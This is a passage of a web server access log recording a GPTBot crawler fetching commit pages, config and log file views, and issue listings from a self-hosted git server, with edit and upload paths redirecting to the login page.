"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11028] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" -[17/Feb/2026:16:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11059] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:16:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 11057] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" -[17/Feb/2026:16:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18420] [Gzip 12.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:16:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:16:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" -[17/Feb/2026:16:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" -[17/Feb/2026:16:22:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:22:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" -[17/Feb/2026:16:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" -[17/Feb/2026:16:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11253] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:16:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html" [Client 74.7.227.38] [Length 26057] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" -[17/Feb/2026:16:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx" [Client 74.7.227.38] [Length 10046] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" -[17/Feb/2026:16:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" -[17/Feb/2026:16:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx" -[17/Feb/2026:16:22:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" -[17/Feb/2026:16:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx" -[17/Feb/2026:16:22:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" -[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx" -[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11063] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:16:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11063] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" -[17/Feb/2026:16:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13676] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11900] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:16:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14764] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" -[17/Feb/2026:16:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" -[17/Feb/2026:16:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" -[17/Feb/2026:16:22:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:16:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:16:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:16:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=reversealphabetically" [Client 74.7.227.38] [Length 5081] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" -[17/Feb/2026:16:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 